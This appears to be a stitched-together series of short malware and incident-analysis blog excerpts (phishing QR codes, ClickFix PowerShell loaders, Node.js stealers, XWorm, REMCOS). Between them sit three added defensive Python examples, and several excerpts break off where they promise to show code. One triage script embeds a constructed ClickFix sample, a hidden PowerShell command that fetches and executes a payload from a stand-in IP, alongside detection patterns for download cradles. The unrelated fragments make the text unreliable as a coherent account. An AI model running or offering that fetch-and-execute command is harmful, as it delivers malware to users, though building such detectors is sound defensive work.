I recently analyzed the following phishing email. It contains a Microsoft account harvester and has some interesting anti-analysis functions. I didn’t do a full dive on it, but there’s some interesting stuff here.
Examining the email in a text editor revealed that the headers had been manipulated.
The QR code image was extracted from the email via the Base64 encoded string object. This was put into CyberChef for rasterization and analysis.
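The extraction step described above, as an added example that is not part of the original post: a small Python routine that walks every MIME part of a message and pulls out embedded images, whether they arrive as an image attachment or as a base64 `data:` URI inside the HTML body, and hashes each one so it can be pivoted on before any rasterization. The message, sender addresses and the placeholder PNG bytes are all constructed here; the real email and its QR code are not reproduced.

```python
import base64
import hashlib
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Constructed placeholder "image": a PNG signature followed by padding bytes.
# It stands in for the QR code image; it is not the image from the phishing email.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(8)
FAKE_PNG_SHA256 = hashlib.sha256(FAKE_PNG).hexdigest()

DATA_URI_RE = re.compile(r"data:image/([a-z0-9.+-]+);base64,([A-Za-z0-9+/=]+)", re.I)


def build_sample_eml() -> bytes:
    """Build a constructed phishing-style message that carries the image twice:
    inline as a data: URI in the HTML body and as a separate image/png part."""
    b64 = base64.b64encode(FAKE_PNG).decode("ascii")
    msg = EmailMessage()
    msg["From"] = "it-support@example.invalid"   # constructed sender
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Action required: re-enroll your authenticator"
    msg.set_content("Scan the QR code in the HTML version of this message.")
    msg.add_alternative(
        "<html><body><p>Scan to re-enroll:</p>"
        f'<img src="data:image/png;base64,{b64}"></body></html>',
        subtype="html",
    )
    msg.add_attachment(FAKE_PNG, maintype="image", subtype="png", filename="qr.png")
    return msg.as_bytes()


def extract_images(raw_eml: bytes) -> list[dict]:
    """Walk every MIME part and return each embedded image with a hash,
    whether it arrived as an attachment or inside an HTML data: URI."""
    msg = message_from_bytes(raw_eml, policy=policy.default)
    found = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype.startswith("image/"):
            data = part.get_content()          # bytes, transfer-encoding already removed
            found.append(_describe(data, "mime-part", part.get_filename() or ctype))
        elif ctype == "text/html":
            for mime, b64 in DATA_URI_RE.findall(part.get_content()):
                try:
                    data = base64.b64decode(b64, validate=True)
                except ValueError:
                    continue                   # malformed data: URI, skip it
                found.append(_describe(data, "html-data-uri", f"image/{mime}"))
    return found


def _describe(data: bytes, source: str, label: str) -> dict:
    return {
        "source": source,
        "label": label,
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        # Magic-byte check: trust the bytes, not the declared MIME type or filename.
        "is_png": data.startswith(b"\x89PNG\r\n\x1a\n"),
    }


if __name__ == "__main__":
    for img in extract_images(build_sample_eml()):
        print(img)
```

The hash is taken over the decoded bytes, so the same QR image carried inline and as an attachment collapses to one indicator, and the magic-byte check catches a part whose declared type does not match its content.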
A user received a phishing email that redirected them to hxxps[://]popthecard[.]pages[.]dev. This page claimed that a friend had sent an invitation and that the user had to download and open it on a Windows laptop or desktop to view it. The page automatically downloaded the file VelvetPaperCo.exe (invitation.exe in similar incidents).
The page itself is rather basic, with the following JavaScript code handling the download function. It simply sets a timeout and then executes a function that reaches out to a public Cloudflare R2 bucket hosting the malicious RMM installer.
With the rise of AI, Vibe-Coded malware is now an existing threat. Sort of? In the way that a wet noodle could potentially kill you in the right circumstances, Vibe-Coded malware could also pose a threat. It’s just very unlikely. At least, with the current iterations out there.
Enter what I’m calling “Baby’s first malware”, AKA “Fisher-Price Malware”: a Vibe-Coded sample found on a user’s device. It’s an “obfuscated” PowerShell loader that pulls a payload that… takes screenshots and uploads them? Kind of? Technically, it works. Sometimes. In perfect conditions.
Node.js is commonly used to deploy stealers on devices. These incidents often involve WebView2 applications bundled into InnoSetup installers. The installers use custom scheduled task XML configurations to create tasks that run malicious Node.js scripts on the host device. Trend Micro refers to this as EvilAI.
The linked article does a great job of breaking these down. They’re essentially .NET assemblies that use WebView2 and AI-generated “web applications” (read: vibe-coded HTML pages). These applications are bundled into an InnoSetup installer together with Node and a malicious script. When the installer runs, it sets up a scheduled task to execute the Node script. The user only sees the intended “legitimate” AI web app get installed.
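Since the persistence here lives in a scheduled task definition, the artifact worth triaging is the task XML itself. The following is an added example, not code from this post or from the Trend Micro write-up: a Python script that loads an exported Task Scheduler XML (normally UTF-16 with a BOM), pulls the trigger, hidden flag and every Exec action, and flags a task that launches a Node runtime with a script from a user-writable path. Both task definitions below are constructed for the example, not recovered from a real installer.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
NODE_NAMES = {"node.exe", "node"}
USER_WRITABLE_RE = re.compile(
    r"\\(Users|ProgramData)\\|\\AppData\\|%(APPDATA|LOCALAPPDATA|TEMP|TMP|PUBLIC|USERPROFILE)%",
    re.I,
)

# Constructed task definition: a hidden logon task that launches a bundled node.exe
# with a script from a user-writable folder. Paths and names are made up.
SUSPICIOUS_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Keeps the AI assistant up to date.</Description></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\Public\\AIAssistant\\node.exe</Command>
      <Arguments>"C:\\Users\\Public\\AIAssistant\\resources\\update.js"</Arguments>
      <WorkingDirectory>C:\\Users\\Public\\AIAssistant</WorkingDirectory>
    </Exec>
  </Actions>
</Task>""".encode("utf-16")

# Constructed benign task for comparison: a scheduled service start from %windir%.
BENIGN_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-09-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>%windir%\\system32\\sc.exe</Command><Arguments>start wuauserv</Arguments></Exec>
  </Actions>
</Task>""".encode("utf-16")


def load_task_xml(raw: bytes) -> ET.Element:
    """Decode an exported task (UTF-16 with BOM, or UTF-8) and parse it.
    The XML declaration is stripped because fromstring() rejects str input that carries one."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8-sig")
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)
    return ET.fromstring(text)


def analyze_task(raw: bytes) -> dict:
    """Summarize triggers and actions, and collect reasons the task looks like a loader."""
    root = load_task_xml(raw)
    triggers_el = root.find("t:Triggers", NS)
    triggers = [c.tag.split("}")[-1] for c in triggers_el] if triggers_el is not None else []
    hidden = root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS).strip().lower() == "true"
    actions, reasons = [], []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        actions.append({"command": cmd, "arguments": args})
        if ntpath.basename(cmd).lower() in NODE_NAMES:
            reasons.append("node-runtime")
        if re.search(r"\.js\b", args, re.I):
            reasons.append("js-script-argument")
        if USER_WRITABLE_RE.search(cmd):
            reasons.append("user-writable-path")
    if hidden:
        reasons.append("hidden-task")
    if "LogonTrigger" in triggers or "BootTrigger" in triggers:
        reasons.append("logon-or-boot-persistence")
    return {
        "triggers": triggers,
        "hidden": hidden,
        "actions": actions,
        "reasons": reasons,
        "suspicious": "node-runtime" in reasons or len(reasons) >= 3,
    }


if __name__ == "__main__":
    print(analyze_task(SUSPICIOUS_TASK_XML))
    print(analyze_task(BENIGN_TASK_XML))
```

On a live host the same XML is available from `C:\Windows\System32\Tasks\<name>` (no extension, UTF-16) or via `schtasks /Query /XML`, so the loader above reads raw bytes rather than assuming an encoding.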
On Saturday, September 20th, 2025, a user visited a compromised domain serving a malicious redirect to a ClickFix campaign page. This campaign used a dynamic ClickFix template that builds legitimate-looking CAPTCHA turnstiles based on passed parameters. This specific ClickFix template was covered in the article ClickFix - The RAT that almost got away. The campaign attempted to deliver a NetSupport RAT via a PowerShell loader. This loader is also part of the kit, but some minor changes have occurred between the previous incidents and this campaign.
I came across an interesting program yesterday. A user had downloaded a “calendar” application that had flagged our EDR product. I pulled the History file from the user’s browser, found the download URL, and grabbed a copy of it for analysis.
The binary came as a 7-Zip self-extracting executable (SFX). Extracting it revealed a NeutralinoJS application. NeutralinoJS is an alternative to Electron: it combines HTML, CSS, and JavaScript into a single WebView2-based desktop application, and packs the code and resources into a .neu file that is bundled into the 7-Zip SFX. This means you can view the source code of any NeutralinoJS application without much work.
NOTE: Quick and dirty upload of some notes from an XWorm sample.
Technical Analysis
The user visited hxxps[://]portal-secure[.]com on Sep. 9, 2025 at 7:49:27.978. This domain served a malicious ClickFix page instructing the user to execute code via Win+R.
The ClickFix domain copied the following code to the user’s clipboard:
The ClickFix PowerShell code was first executed on Sep. 9, 2025 at 7:50:30.859. This code pulls a loader named x.jpg from 77[.]83[.]207[.]225. Geolocation of this address placed it in Moscow, Russia.
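The Win+R chain above leaves the pasted command in artifacts such as the RunMRU key and PowerShell script-block logs. The following is an added example, not code from this post: a Python triage routine that scores a recovered command string against the usual ClickFix tells (a PowerShell or mshta launcher, hidden window, download cradle, Invoke-Expression, and the verification-style comment these lures append) and extracts any URLs in defanged form. The sample command is constructed to match the pattern; its IP is a documentation address, not the one from this incident.

```python
import re

# Indicator patterns commonly seen in ClickFix clipboard payloads (matched case-insensitively).
INDICATORS = {
    "powershell-launch": r"\b(powershell|pwsh)(\.exe)?\b",
    "hidden-window": r"-w(indowstyle)?\s+h(idden)?\b",
    "no-profile": r"-nop(rofile)?\b",
    "execution-policy-bypass": r"-e(xecutionpolicy|p)\s+bypass\b",
    "download-cradle": r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|certutil|bitsadmin)\b",
    "invoke-expression": r"\b(iex|invoke-expression)\b",
    "mshta": r"\bmshta\b",
    "captcha-lure-comment": r"#.*(not a robot|captcha|verification)",
}
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)


def defang(url: str) -> str:
    """Make an extracted URL safe to paste into a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage_clipboard_command(cmd: str) -> dict:
    """Score one recovered command line and pull out its download URLs."""
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, cmd, re.I)]
    urls = [defang(u) for u in URL_RE.findall(cmd)]
    launcher = any(h in hits for h in ("powershell-launch", "mshta"))
    fetch_and_run = any(h in hits for h in ("download-cradle", "invoke-expression", "mshta"))
    return {
        "indicators": hits,
        "urls": urls,
        "score": len(hits),
        # A launcher plus something that fetches or evaluates code is the core of the pattern;
        # the score threshold keeps a lone "powershell iwr" from being called ClickFix on its own.
        "likely_clickfix": launcher and fetch_and_run and len(hits) >= 3,
    }


# Constructed sample clipboard contents (documentation IP, made-up verification string).
SAMPLE_CLIPBOARD = (
    'powershell -w hidden -nop -c "iex (iwr http://198.51.100.10/x.jpg -UseBasicParsing)" '
    "# I am not a robot - reCAPTCHA Verification ID: 7811"
)
# Constructed benign Run-box entry for comparison.
BENIGN_RUN_COMMAND = "ipconfig /all"


if __name__ == "__main__":
    for entry in (SAMPLE_CLIPBOARD, BENIGN_RUN_COMMAND):
        print(entry)
        print("  ->", triage_clipboard_command(entry))
```

Feed it each value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` or each ScriptBlockText from event 4104; the defanged URL list is what goes into the IOC section of the write-up.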
A fun thing about WSL 2 is that it is fully capable of calling Windows-native functions and binaries. It also has cron, which opens the opportunity to do some interesting things to someone’s unattended device.
Take this MSHTA execution for example. It’s a simple SAPI call made in JavaScript. All it does is use SAPI to say “hello”. I’ve had a lot of fun in the past with various SAPI-based jokes, and this is a pretty straightforward way to do it.
Side note: this malware sample was originally analyzed on 07-30-2025. I was just lazy and didn’t get the post up until today. Dates in the analysis reflect the 07/30 analysis date. This is also a really lazy writeup.
Intro
The initial incident was observed by Point Wild’s Threat Intelligence team (Report Here).
This report covers the analysis of the sample and attack chain. Check it out; it’s a good write-up. However, as of the publicly available reporting at the time of the original analysis, there was no information on injection into SndVol.exe as the method for loading the REMCOS payload.